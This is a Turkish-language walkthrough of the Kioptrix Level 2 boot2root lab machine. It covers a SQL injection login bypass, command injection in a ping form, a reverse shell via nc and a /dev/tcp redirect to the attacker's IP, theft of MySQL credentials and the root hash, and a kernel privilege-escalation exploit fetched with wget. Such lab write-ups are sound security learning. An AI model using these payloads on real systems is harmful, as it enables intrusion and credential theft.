Boot2Root: Kioptrix Level 2

Keşif

Netdiscover bize makinanın IP adresini veriyor:

Screen Shot 2017-07-13 at 19.24.07.png

Bulunan IP adresi üzerindeki servisleri tarıyoruz:

nmap.png

Zafiyet Analizi

  • Sunucu üzerinde Apache 2.0.52 ve MySQL çalışıyor. Web arayüzü de bulunmakta.
  • CUPS 1.1 bir kaç zafiyet içeriyor fakat sunucu üzerinde denendiğinde bir sonuç elde edilemedi.

Atalarımız demiş ki: Bir yerde SQL varsa orada SQL injection da vardır.

Exploit

Web arayüzünde bizi login ekranı karşılıyor.  ” ‘ or 1=1 — ” girdisi ile login bypass edilerek yönetici paneline giriyoruz:

sqli.png

 

Bizi ağda cihaz pingleme adında bir sayfa karşılıyor. Ping atmak için alınan girdinin kontrolünün yapılmama ihtimalini göz önünde bulundurarak “; id” girdisi verildiğinde kullanıcı girdilerinin kontrol edilmediği ve kodun zafiyet içerdiği görülüyor.

cmdi.png

cmdiproof.png

Sunucu üzerinde interaktif olmayan ve apache yetkileri bulunan bir shell sahibiyiz. Yapmamız gereken ilk şey interaktif bir shell elde etmek. Sonra ise root yetkisi kazanmak.

İnteraktif bir shell elde etmek için önce kendi terminalimizde “nc -nlvp 4444” ile karşıdan atılan shell’i tutmaya hazırlanıyoruz. Daha sonra web arayüzünde girdi olarak verilen “; python -c ‘import pty;pty.spawn(“/bin/sh”)’ >& /dev/tcp/172.16.28.130/4444 0>&1″ komutu bize yakışıklı bir shell veriyor.

Screen Shot 2017-07-13 at 19.51.25.png

 

index.php dosyasının içine baktığımızda bir adet MySQL kimlik bilgisi görüyoruz:

Screen Shot 2017-07-13 at 19.58.39.png

Bulduğumuz bilgileri kullanarak MySQL’e bağlanıyoruz ve webapp veritabanı içerisinde root parolasının hashine ulaşıyoruz:

Screen Shot 2017-07-13 at 20.02.27.png

Privilege Escalation için Linux Kernel 2.6.9 exploit arattığımızda karşımıza pek çok exploit çıkıyor:

Screen Shot 2017-07-13 at 20.34.50.png

Ben bunu kullandım: https://www.exploit-db.com/exploits/9545/

Karşı sunucuya wget yardımıyla exploit kodunu /tmp içerisine attıktan sonra compile edip çalıştırıyoruz ve root oluyoruz:

Screen Shot 2017-07-13 at 20.40.01.png

Başarıyla veritabanı kullanıcılarını ele geçirip ve root olmayı başardık.